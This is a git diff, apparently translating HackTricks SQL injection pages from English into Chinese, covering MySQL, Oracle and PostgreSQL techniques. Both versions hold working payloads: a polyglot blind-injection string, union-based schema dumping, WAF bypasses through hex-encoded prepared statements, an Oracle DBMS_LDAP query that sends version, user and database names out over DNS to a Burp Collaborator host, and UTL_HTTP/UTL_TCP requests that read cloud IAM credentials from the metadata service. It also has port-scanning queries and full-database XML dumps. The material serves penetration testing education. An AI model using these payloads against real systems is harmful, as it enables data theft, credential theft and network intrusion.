 strcmp(),mid(),,ldap(),rdap(),left(),rigth(),instr(),sleep()
 ```
-
-## All injection
-
+## 所有注入
 ```sql
 SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"
 ```
+## 流程
 
-from [https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/)
-
-## Flow
-
-Remember that in "modern" versions of **MySQL** you can substitute "_**information_schema.tables**_" for "_**mysql.innodb_table_stats**_**"** (This could be useful to bypass WAFs).
-
+请记住，在“现代”版本的 **MySQL** 中，您可以将 "_**information_schema.tables**_" 替换为 "_**mysql.innodb_table_stats**_**"**（这可能有助于绕过 WAF）。
 ```sql
 SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables
 SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table
 SELECT <COLUMN1>,<COLUMN2> FROM <TABLE_NAME>; #Get values
 SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges
 ```
-
-### **Only 1 value**
+### **仅 1 个值**
 
 - `group_concat()`
 - `Limit X,1`
 
-### **Blind one by one**
+### **盲注逐个**
 
-- `substr(version(),X,1)='r'` or `substring(version(),X,1)=0x70` or `ascii(substr(version(),X,1))=112`
+- `substr(version(),X,1)='r'` 或 `substring(version(),X,1)=0x70` 或 `ascii(substr(version(),X,1))=112`
 - `mid(version(),X,1)='5'`
 
-### **Blind adding**
+### **盲注添加**
 
 - `LPAD(version(),1...lenght(version()),'1')='asd'...`
 - `RPAD(version(),1...lenght(version()),'1')='asd'...`
@@ -91,10 +79,9 @@ SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges
 - `SELECT LEFT(version(),1...lenght(version()))='asd'...`
 - `SELECT INSTR('foobarbar', 'fo...')=1`
 
-## Detect number of columns
-
-Using a simple ORDER
+## 检测列数
 
+使用简单的 ORDER
 ```
 order by 1
 order by 2
@@ -107,88 +94,74 @@ UniOn SeLect 1,2
 UniOn SeLect 1,2,3
 ...
 ```
-
-## MySQL Union Based
-
+## MySQL 联合注入
 ```sql
 UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
 UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
 UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
 UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
 ```
-
 ## SSRF
 
-**Learn here different options to** [**abuse a Mysql injection to obtain a SSRF**](mysql-ssrf.md)**.**
+**在这里了解不同的选项以** [**滥用 Mysql 注入来获取 SSRF**](mysql-ssrf.md)**。**
 
-## WAF bypass tricks
+## WAF 绕过技巧
 
-### Executing queries through Prepared Statements
-
-When stacked queries are allowed, it might be possible to bypass WAFs by assigning to a variable the hex representation of the query you want to execute (by using SET), and then use the PREPARE and EXECUTE MySQL statements to ultimately execute the query. Something like this:
+### 通过预处理语句执行查询
 
+当允许堆叠查询时，可以通过将要执行的查询的十六进制表示分配给变量（使用 SET），然后使用 PREPARE 和 EXECUTE MySQL 语句最终执行查询，从而绕过 WAF。类似于这样：
 ```
 0); SET @query = 0x53454c45435420534c454550283129; PREPARE stmt FROM @query; EXECUTE stmt; #
 ```
+有关更多信息，请参阅 [this blog post](https://karmainsecurity.com/impresscms-from-unauthenticated-sqli-to-rce)。
 
-For more information please refer to [this blog post](https://karmainsecurity.com/impresscms-from-unauthenticated-sqli-to-rce).
+### Information_schema 替代方案
 
-### Information_schema alternatives
+请记住，在 **MySQL** 的“现代”版本中，您可以将 _**information_schema.tables**_ 替换为 _**mysql.innodb_table_stats**_ 或 _**sys.x$schema_flattened_keys**_ 或 **sys.schema_table_statistics**
 
-Remember that in "modern" versions of **MySQL** you can substitute _**information_schema.tables**_ for _**mysql.innodb_table_stats**_ or for _**sys.x$schema_flattened_keys**_ or for **sys.schema_table_statistics**
-
-### MySQLinjection without COMMAS
-
-Select 2 columns without using any comma ([https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma](https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma)):
+### MySQL 注入无逗号
 
+选择 2 列而不使用任何逗号 ([https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma](https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma)):
 ```
 -1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1#
 ```
+### 检索没有列名的值
 
-### Retrieving values without the column name
-
-If at some point you know the name of the table but you don't know the name of the columns inside the table, you can try to find how may columns are there executing something like:
-
+如果在某个时刻你知道表的名称，但不知道表内列的名称，你可以尝试执行类似以下的操作来查找有多少列：
 ```bash
 # When a True is returned, you have found the number of columns
 select (select "", "") = (SELECT * from demo limit 1);     # 2columns
 select (select "", "", "") < (SELECT * from demo limit 1); # 3columns
 ```
-
-Supposing there is 2 columns (being the first one the ID) and the other one the flag, you can try to bruteforce the content of the flag trying character by character:
-
+假设有两列（第一列是ID，第二列是flag），你可以尝试逐个字符地暴力破解flag的内容：
 ```bash
 # When True, you found the correct char and can start ruteforcing the next position
 select (select 1, 'flaf') = (SELECT * from demo limit 1);
 ```
+更多信息请见 [https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952](https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952)
 
-More info in [https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952](https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952)
+### MySQL 历史
 
-### MySQL history
-
-You ca see other executions inside the MySQL reading the table: **sys.x$statement_analysis**
-
-### Version alternative**s**
+您可以通过读取表 **sys.x$statement_analysis** 查看其他执行情况。
 
+### 版本替代**s**
 ```
 mysql> select @@innodb_version;
 mysql> select @@version;
 mysql> select version();
 ```
+## 其他MYSQL注入指南
 
-## Other MYSQL injection guides
+- [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
 
-- [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)]
-
-## References
+## 参考文献
 
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
 
 <figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
 
-​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
+​​​​[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件，也是 **欧洲** 最重要的活动之一。该大会 **旨在促进技术知识**，是各个学科技术和网络安全专业人士的热烈交流平台。
 
 {% embed url="https://www.rootedcon.com/" %}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md b/src/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
index 0e8996fcb..81f761b6a 100644
--- a/src/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
+++ b/src/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
@@ -1,30 +1,29 @@
-# MySQL File priv to SSRF/RCE
+# MySQL 文件权限到 SSRF/RCE
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-**This is a summary of the MySQL/MariaDB/Percona techniques from [https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/)**.
+**这是来自 [https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/) 的 MySQL/MariaDB/Percona 技术摘要**。
 
-### Server-Side Request Forgery (SSRF) via SQL Functions
+### 通过 SQL 函数进行服务器端请求伪造 (SSRF)
 
-In the exploration of SQL Out of Band data exfiltration, the `LOAD_FILE()` function is commonly employed to initiate network requests. This function, however, is constrained by the operating system it operates on and the database's startup configurations.
+在 SQL 带外数据外泄的探索中，`LOAD_FILE()` 函数通常用于发起网络请求。然而，该函数受到其运行的操作系统和数据库启动配置的限制。
 
-The `secure_file_priv` global variable, if unset, defaults to `/var/lib/mysql-files/`, limiting file access to this directory unless set to an empty string (`""`). This adjustment necessitates modifications in the database's configuration file or startup parameters.
+`secure_file_priv` 全局变量如果未设置，默认为 `/var/lib/mysql-files/`，限制文件访问仅限于此目录，除非设置为空字符串 (`""`)。此调整需要修改数据库的配置文件或启动参数。
 
-Given `secure_file_priv` is disabled (`""`), and assuming the necessary file and `file_priv` permissions are granted, files outside the designated directory can be read. Yet, the capability for these functions to make network calls is highly dependent on the operating system. On Windows systems, network calls to UNC paths are feasible due to the operating system's understanding of UNC naming conventions, potentially leading to the exfiltration of NTLMv2 hashes.
+假设 `secure_file_priv` 被禁用 (`""`)，并且授予了必要的文件和 `file_priv` 权限，则可以读取指定目录外的文件。然而，这些函数进行网络调用的能力高度依赖于操作系统。在 Windows 系统上，由于操作系统对 UNC 命名约定的理解，可以进行对 UNC 路径的网络调用，这可能导致 NTLMv2 哈希的外泄。
 
-This SSRF method is limited to TCP port 445 and does not permit port number modification, though it can be used to access shares with full read privileges and, as demonstrated in prior research, to steal hashes for further exploitation.
+此 SSRF 方法仅限于 TCP 端口 445，并且不允许修改端口号，尽管可以用于访问具有完全读取权限的共享，并且如先前研究所示，可以窃取哈希以进行进一步利用。
 
-### Remote Code Execution (RCE) via User Defined Functions (UDF)
+### 通过用户定义函数 (UDF) 进行远程代码执行 (RCE)
 
-MySQL databases offer the use of User Defined Functions (UDF) from external library files. If these libraries are accessible within specific directories or the system's `$PATH`, they can be invoked from within MySQL.
+MySQL 数据库提供了从外部库文件使用用户定义函数 (UDF) 的功能。如果这些库在特定目录或系统的 `$PATH` 中可访问，则可以从 MySQL 内部调用它们。
 
-This technique allows for the execution of network/HTTP requests through a UDF, provided several conditions are met, including write access to the `@@plugin_dir`, `file_priv` set to `Y`, and `secure_file_priv` disabled.
+该技术允许通过 UDF 执行网络/HTTP 请求，前提是满足几个条件，包括对 `@@plugin_dir` 的写入访问、`file_priv` 设置为 `Y`，以及禁用 `secure_file_priv`。
 
-For instance, the `lib_mysqludf_sys` library or other UDF libraries enabling HTTP requests can be loaded to perform SSRF. The libraries must be transferred to the server, which can be achieved through hex or base64 encoding of the library's contents and then writing it to the appropriate directory.
+例如，可以加载 `lib_mysqludf_sys` 库或其他支持 HTTP 请求的 UDF 库以执行 SSRF。这些库必须传输到服务器，可以通过对库内容进行十六进制或 base64 编码，然后写入适当的目录来实现。
 
-The process varies if the `@@plugin_dir` is not writable, especially for MySQL versions above `v5.0.67`. In such cases, alternative paths that are writable must be used.
+如果 `@@plugin_dir` 不可写，过程会有所不同，尤其是对于 `v5.0.67` 以上的 MySQL 版本。在这种情况下，必须使用可写的替代路径。
 
-Automation of these processes can be facilitated by tools such as SQLMap, which supports UDF injection, and for blind SQL injections, output redirection or DNS request smuggling techniques may be utilized.
+这些过程的自动化可以通过支持 UDF 注入的工具如 SQLMap 来实现，对于盲 SQL 注入，可以利用输出重定向或 DNS 请求走私技术。
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/sql-injection/oracle-injection.md b/src/pentesting-web/sql-injection/oracle-injection.md
index c0c88c97c..4dc235345 100644
--- a/src/pentesting-web/sql-injection/oracle-injection.md
+++ b/src/pentesting-web/sql-injection/oracle-injection.md
@@ -2,29 +2,25 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-**Serve this post a wayback machine copy of the deleted post from [https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/)**.
+**为这篇文章提供一个来自 [https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/) 的已删除帖子在时间机器上的副本**。
 
 ## SSRF
 
-Using Oracle to do Out of Band HTTP and DNS requests is well documented but as a means of exfiltrating SQL data in injections. We can always modify these techniques/functions to do other SSRF/XSPA.
+使用 Oracle 进行带外 HTTP 和 DNS 请求的文档非常丰富，但作为在注入中提取 SQL 数据的一种手段。我们总是可以修改这些技术/函数以执行其他 SSRF/XSPA。
 
-Installing Oracle can be really painful, especially if you want to set up a quick instance to try out commands. My friend and colleague at [Appsecco](https://appsecco.com), [Abhisek Datta](https://github.com/abhisek), pointed me to [https://github.com/MaksymBilenko/docker-oracle-12c](https://github.com/MaksymBilenko/docker-oracle-12c) that allowed me to setup an instance on a t2.large AWS Ubuntu machine and Docker.
-
-I ran the docker command with the `--network="host"` flag so that I could mimic Oracle as an native install with full network access, for the course of this blogpost.
+安装 Oracle 可能非常麻烦，特别是如果你想快速设置一个实例来尝试命令。我的朋友和同事在 [Appsecco](https://appsecco.com)， [Abhisek Datta](https://github.com/abhisek)，指引我到 [https://github.com/MaksymBilenko/docker-oracle-12c](https://github.com/MaksymBilenko/docker-oracle-12c)，这让我能够在 t2.large AWS Ubuntu 机器和 Docker 上设置一个实例。
 
+我使用 `--network="host"` 标志运行 docker 命令，以便在这篇博客文章的过程中模拟 Oracle 作为一个具有完全网络访问权限的本地安装。
 ```
 docker run -d --network="host" quay.io/maksymbilenko/oracle-12c
 ```
+#### 支持 URL 或主机/端口号规范的 Oracle 包 <a href="#oracle-packages-that-support-a-url-or-a-hostname-port-number-specification" id="oracle-packages-that-support-a-url-or-a-hostname-port-number-specification"></a>
 
-#### Oracle packages that support a URL or a Hostname/Port Number specification <a href="#oracle-packages-that-support-a-url-or-a-hostname-port-number-specification" id="oracle-packages-that-support-a-url-or-a-hostname-port-number-specification"></a>
-
-In order to find any packages and functions that support a host and port specification, I ran a Google search on the [Oracle Database Online Documentation](https://docs.oracle.com/database/121/index.html). Specifically,
-
+为了找到支持主机和端口规范的任何包和函数，我在 [Oracle Database Online Documentation](https://docs.oracle.com/database/121/index.html) 上进行了 Google 搜索。具体来说，
 ```
 site:docs.oracle.com inurl:"/database/121/ARPLS" "host"|"hostname" "port"|"portnum"
 ```
-
-The search returned the following results (not all can be used to perform outbound network)
+搜索返回了以下结果（并非所有结果都可以用于执行出站网络）
 
 - DBMS_NETWORK_ACL_ADMIN
 - UTL_SMTP
@@ -41,39 +37,34 @@ The search returned the following results (not all can be used to perform outbou
 - DBMS_STREAMS_ADM
 - UTL_HTTP
 
-This crude search obviously skips packages like `DBMS_LDAP` (which allows passing a hostname and port number) as [the documentation page](https://docs.oracle.com/database/121/ARPLS/d_ldap.htm#ARPLS360) simply points you to a [different location](https://docs.oracle.com/database/121/ARPLS/d_ldap.htm#ARPLS360). Hence, there may be other Oracle packages that can be abused to make outbound requests that I may have missed.
+这个粗略的搜索显然跳过了像 `DBMS_LDAP` 这样的包（它允许传递主机名和端口号），因为 [文档页面](https://docs.oracle.com/database/121/ARPLS/d_ldap.htm#ARPLS360) 只是将您指向 [不同的位置](https://docs.oracle.com/database/121/ARPLS/d_ldap.htm#ARPLS360)。因此，可能还有其他可以被滥用以发起出站请求的Oracle包，我可能遗漏了。
 
-In any case, let’s take a look at some of the packages that we have discovered and listed above.
+无论如何，让我们看看我们发现并列出的某些包。
 
 **DBMS_LDAP.INIT**
 
-The `DBMS_LDAP` package allows for access of data from LDAP servers. The `init()` function initializes a session with an LDAP server and takes a hostname and port number as an argument.
-
-This function has been documented before to show exfiltration of data over DNS, like below
+`DBMS_LDAP` 包允许访问来自LDAP服务器的数据。`init()` 函数初始化与LDAP服务器的会话，并将主机名和端口号作为参数。
 
+这个函数之前已经被记录下来，以显示通过DNS的数据外泄，如下所示。
 ```
 SELECT DBMS_LDAP.INIT((SELECT version FROM v$instance)||'.'||(SELECT user FROM dual)||'.'||(select name from V$database)||'.'||'d4iqio0n80d5j4yg7mpu6oeif9l09p.burpcollaborator.net',80) FROM dual;
 ```
+然而，由于该函数接受主机名和端口号作为参数，您可以利用这一点使其像端口扫描器一样工作。
 
-However, given that the function accepts a hostname and a port number as arguments, you can use this to work like a port scanner as well.
-
-Here are a few examples
-
+以下是一些示例
 ```
 SELECT DBMS_LDAP.INIT('scanme.nmap.org',22) FROM dual;
 SELECT DBMS_LDAP.INIT('scanme.nmap.org',25) FROM dual;
 SELECT DBMS_LDAP.INIT('scanme.nmap.org',80) FROM dual;
 SELECT DBMS_LDAP.INIT('scanme.nmap.org',8080) FROM dual;
 ```
-
-A `ORA-31203: DBMS_LDAP: PL/SQL - Init Failed.` shows that the port is closed while a session value points to the port being open.
+`ORA-31203: DBMS_LDAP: PL/SQL - Init Failed.` 表示端口关闭，而会话值指向端口为开放状态。
 
 **UTL_SMTP**
 
-The `UTL_SMTP` package is designed for sending e-mails over SMTP. The example provided on the [Oracle documentation site shows how you can use this package to send an email](https://docs.oracle.com/database/121/ARPLS/u_smtp.htm#ARPLS71478). For us, however, the interesting thing is with the ability to provide a host and port specification.
-
-A crude example is shown below with the `UTL_SMTP.OPEN_CONNECTION` function, with a timeout of 2 seconds
+`UTL_SMTP` 包用于通过 SMTP 发送电子邮件。 [Oracle 文档网站上提供的示例展示了如何使用此包发送电子邮件](https://docs.oracle.com/database/121/ARPLS/u_smtp.htm#ARPLS71478)。 然而，对我们来说，值得关注的是提供主机和端口规范的能力。
 
+下面是一个粗略的示例，使用 `UTL_SMTP.OPEN_CONNECTION` 函数，超时为 2 秒。
 ```
 DECLARE c utl_smtp.connection;
 BEGIN
@@ -87,76 +78,68 @@ BEGIN
 c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',8080,2);
 END;
 ```
-
-A `ORA-29276: transfer timeout` shows port is open but no SMTP connection was estabilished while a `ORA-29278: SMTP transient error: 421 Service not available` shows that the port is closed.
+`ORA-29276: transfer timeout` 表示端口开放但未建立 SMTP 连接，而 `ORA-29278: SMTP transient error: 421 Service not available` 表示端口关闭。
 
 **UTL_TCP**
 
-The `UTL_TCP` package and its procedures and functions allow [TCP/IP based communication with services](https://docs.oracle.com/cd/B28359_01/appdev.111/b28419/u_tcp.htm#i1004190). If programmed for a specific service, this package can easily become a way into the network or perform full Server Side Requests as all aspects of a TCP/IP connection can be controlled.
-
-The example [on the Oracle documentation site shows how you can use this package to make a raw TCP connection to fetch a web page](https://docs.oracle.com/cd/B28359_01/appdev.111/b28419/u_tcp.htm#i1004190). We can simply it a little more and use it to make requests to the metadata instance for example or to an arbitrary TCP/IP service.
+`UTL_TCP` 包及其过程和函数允许与服务进行 [基于 TCP/IP 的通信](https://docs.oracle.com/cd/B28359_01/appdev.111/b28419/u_tcp.htm#i1004190)。如果为特定服务编程，此包可以轻松成为进入网络的途径或执行完整的服务器端请求，因为可以控制 TCP/IP 连接的所有方面。
 
+示例 [在 Oracle 文档网站上显示了如何使用此包建立原始 TCP 连接以获取网页](https://docs.oracle.com/cd/B28359_01/appdev.111/b28419/u_tcp.htm#i1004190)。我们可以稍微简化一下，使用它向元数据实例或任意 TCP/IP 服务发出请求。
 ```
 set serveroutput on size 30000;
 SET SERVEROUTPUT ON
 DECLARE c utl_tcp.connection;
-  retval pls_integer;
+retval pls_integer;
 BEGIN
-  c := utl_tcp.open_connection('169.254.169.254',80,tx_timeout => 2);
-  retval := utl_tcp.write_line(c, 'GET /latest/meta-data/ HTTP/1.0');
-  retval := utl_tcp.write_line(c);
-  BEGIN
-    LOOP
-      dbms_output.put_line(utl_tcp.get_line(c, TRUE));
-    END LOOP;
-  EXCEPTION
-    WHEN utl_tcp.end_of_input THEN
-      NULL;
-  END;
-  utl_tcp.close_connection(c);
+c := utl_tcp.open_connection('169.254.169.254',80,tx_timeout => 2);
+retval := utl_tcp.write_line(c, 'GET /latest/meta-data/ HTTP/1.0');
+retval := utl_tcp.write_line(c);
+BEGIN
+LOOP
+dbms_output.put_line(utl_tcp.get_line(c, TRUE));
+END LOOP;
+EXCEPTION
+WHEN utl_tcp.end_of_input THEN
+NULL;
+END;
+utl_tcp.close_connection(c);
 END;
 /
 ```
 
 ```
 DECLARE c utl_tcp.connection;
-  retval pls_integer;
+retval pls_integer;
 BEGIN
-  c := utl_tcp.open_connection('scanme.nmap.org',22,tx_timeout => 4);
-  retval := utl_tcp.write_line(c);
-  BEGIN
-    LOOP
-      dbms_output.put_line(utl_tcp.get_line(c, TRUE));
-    END LOOP;
-  EXCEPTION
-    WHEN utl_tcp.end_of_input THEN
-      NULL;
-  END;
-  utl_tcp.close_connection(c);
+c := utl_tcp.open_connection('scanme.nmap.org',22,tx_timeout => 4);
+retval := utl_tcp.write_line(c);
+BEGIN
+LOOP
+dbms_output.put_line(utl_tcp.get_line(c, TRUE));
+END LOOP;
+EXCEPTION
+WHEN utl_tcp.end_of_input THEN
+NULL;
+END;
+utl_tcp.close_connection(c);
 END;
 ```
+有趣的是，由于能够构造原始 TCP 请求，这个包也可以用于查询所有云提供商的实例元数据服务，因为方法类型和附加头都可以在 TCP 请求中传递。
 
-Interestingly, due to the ability to craft raw TCP requests, this package can also be used to query the Instance meta-data service of all cloud providers as the method type and additional headers can all be passed within the TCP request.
-
-**UTL_HTTP and Web Requests**
-
-Perhaps the most common and widely documented technique in every Out of Band Oracle SQL Injection tutorial out there is the [`UTL_HTTP` package](https://docs.oracle.com/database/121/ARPLS/u_http.htm#ARPLS070). This package is defined by the documentation as - `The UTL_HTTP package makes Hypertext Transfer Protocol (HTTP) callouts from SQL and PL/SQL. You can use it to access data on the Internet over HTTP.`
+**UTL_HTTP 和 Web 请求**
 
+也许在所有的离带 Oracle SQL 注入教程中，最常见和广泛记录的技术是 [`UTL_HTTP` package](https://docs.oracle.com/database/121/ARPLS/u_http.htm#ARPLS070)。文档中将这个包定义为 - `UTL_HTTP 包从 SQL 和 PL/SQL 发起超文本传输协议 (HTTP) 调用。您可以使用它通过 HTTP 访问互联网上的数据。`
 ```
 select UTL_HTTP.request('http://169.254.169.254/latest/meta-data/iam/security-credentials/adminrole') from dual;
 ```
-
-You could additionally, use this to perform some rudimentary port scanning as well with queries like
-
+您还可以使用此功能执行一些基本的端口扫描，例如使用以下查询：
 ```
 select UTL_HTTP.request('http://scanme.nmap.org:22') from dual;
 select UTL_HTTP.request('http://scanme.nmap.org:8080') from dual;
 select UTL_HTTP.request('http://scanme.nmap.org:25') from dual;
 ```
+`ORA-12541: TNS:no listener` 或 `TNS:operation timed out` 是 TCP 端口关闭的迹象，而 `ORA-29263: HTTP protocol error` 或数据则是端口开放的迹象。
 
-A `ORA-12541: TNS:no listener` or a `TNS:operation timed out` is a sign that the TCP port is closed, whereas a `ORA-29263: HTTP protocol error` or data is a sign that the port is open.
-
-Another package I have used in the past with varied success is the [`GETCLOB()` method of the `HTTPURITYPE` Oracle abstract type](https://docs.oracle.com/database/121/ARPLS/t_dburi.htm#ARPLS71705) that allows you to interact with a URL and provides support for the HTTP protocol. The `GETCLOB()` method is used to fetch the GET response from a URL as a [CLOB data type.](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)[select HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() from dual;
+我过去使用过的另一个包，成功率各异，是 [`GETCLOB()` 方法的 `HTTPURITYPE` Oracle 抽象类型](https://docs.oracle.com/database/121/ARPLS/t_dburi.htm#ARPLS71705)，它允许您与 URL 交互并支持 HTTP 协议。`GETCLOB()` 方法用于从 URL 获取 GET 响应，作为 [CLOB 数据类型。](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)[select HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() from dual;
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/README.md b/src/pentesting-web/sql-injection/postgresql-injection/README.md
index c29de3a29..2b20ea157 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/README.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/README.md
@@ -1,71 +1,64 @@
-# PostgreSQL injection
+# PostgreSQL 注入
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 <figure><img src="../../../images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
+如果你对 **黑客职业** 感兴趣并想要攻克不可攻克的目标 - **我们正在招聘！** (_需要流利的波兰语书写和口语能力_).
 
 {% embed url="https://www.stmcyber.com/careers" %}
 
 ---
 
-**This page aims to explain different tricks that could help you to exploit a SQLinjection found in a postgresql database and to compliment the tricks you can find on** [**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md)
+**本页面旨在解释不同的技巧，这些技巧可以帮助你利用在 PostgreSQL 数据库中发现的 SQL 注入，并补充你可以在** [**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md) **上找到的技巧。**
 
-## Network Interaction - Privilege Escalation, Port Scanner, NTLM challenge response disclosure & Exfiltration
+## 网络交互 - 权限提升、端口扫描、NTLM 挑战响应泄露与数据外泄
 
-The **PostgreSQL module `dblink`** offers capabilities for connecting to other PostgreSQL instances and executing TCP connections. These features, combined with the `COPY FROM` functionality, enable actions like privilege escalation, port scanning, and NTLM challenge response capture. For detailed methods on executing these attacks check how to [perform these attacks](network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md).
+**PostgreSQL 模块 `dblink`** 提供了连接到其他 PostgreSQL 实例和执行 TCP 连接的能力。这些功能与 `COPY FROM` 功能相结合，使得权限提升、端口扫描和 NTLM 挑战响应捕获等操作成为可能。有关执行这些攻击的详细方法，请查看如何 [执行这些攻击](network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md)。
 
-### **Exfiltration example using dblink and large objects**
+### **使用 dblink 和大对象的数据外泄示例**
 
-You can [**read this example**](dblink-lo_import-data-exfiltration.md) to see a CTF example of **how to load data inside large objects and then exfiltrate the content of large objects inside the username** of the function `dblink_connect`.
+你可以 [**阅读这个示例**](dblink-lo_import-data-exfiltration.md) 来查看一个 CTF 示例，**如何将数据加载到大对象中，然后在函数 `dblink_connect` 的用户名中外泄大对象的内容。**
 
-## PostgreSQL Attacks: Read/write, RCE, privesc
+## PostgreSQL 攻击：读/写、RCE、权限提升
 
-Check how to compromise the host and escalate privileges from PostgreSQL in:
+查看如何从 PostgreSQL 破坏主机并提升权限：
 
 {{#ref}}
 ../../../network-services-pentesting/pentesting-postgresql.md
 {{#endref}}
 
-## WAF bypass
+## WAF 绕过
 
-### PostgreSQL String functions
+### PostgreSQL 字符串函数
 
-Manipulating strings could help you to **bypass WAFs or other restrictions**.\
-[**In this page** ](https://www.postgresqltutorial.com/postgresql-string-functions/)**you can find some useful Strings functions.**
+操纵字符串可以帮助你 **绕过 WAF 或其他限制**。\
+[**在此页面**](https://www.postgresqltutorial.com/postgresql-string-functions/)**你可以找到一些有用的字符串函数。**
 
-### Stacked Queries
-
-Remember that postgresql support stacked queries, but several application will throw an error if 2 responses are returned when expecting just 1. But, you can still abuse the stacked queries via Time injection:
+### 堆叠查询
 
+请记住，PostgreSQL 支持堆叠查询，但如果在期望仅返回 1 个响应时返回 2 个响应，许多应用程序会抛出错误。但是，你仍然可以通过时间注入滥用堆叠查询：
 ```
 id=1; select pg_sleep(10);-- -
 1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- -
 ```
-
-### XML tricks
+### XML技巧
 
 **query_to_xml**
 
-This function will return all the data in XML format in just one file. It's ideal if you want to dump a lot of data in just 1 row:
-
+此函数将以XML格式返回所有数据，仅在一个文件中。如果您想在一行中转储大量数据，这非常理想：
 ```sql
 SELECT query_to_xml('select * from pg_user',true,true,'');
 ```
-
 **database_to_xml**
 
-This function will dump the whole database in XML format in just 1 row (be careful if the database is very big as you may DoS it or even your own client):
-
+此函数将整个数据库以 XML 格式转储为仅 1 行（如果数据库非常大，请小心，因为您可能会导致 DoS 或甚至影响您自己的客户端）：
 ```sql
 SELECT database_to_xml(true,true,'');
 ```
+### 字符串以十六进制表示
 
-### Strings in Hex
-
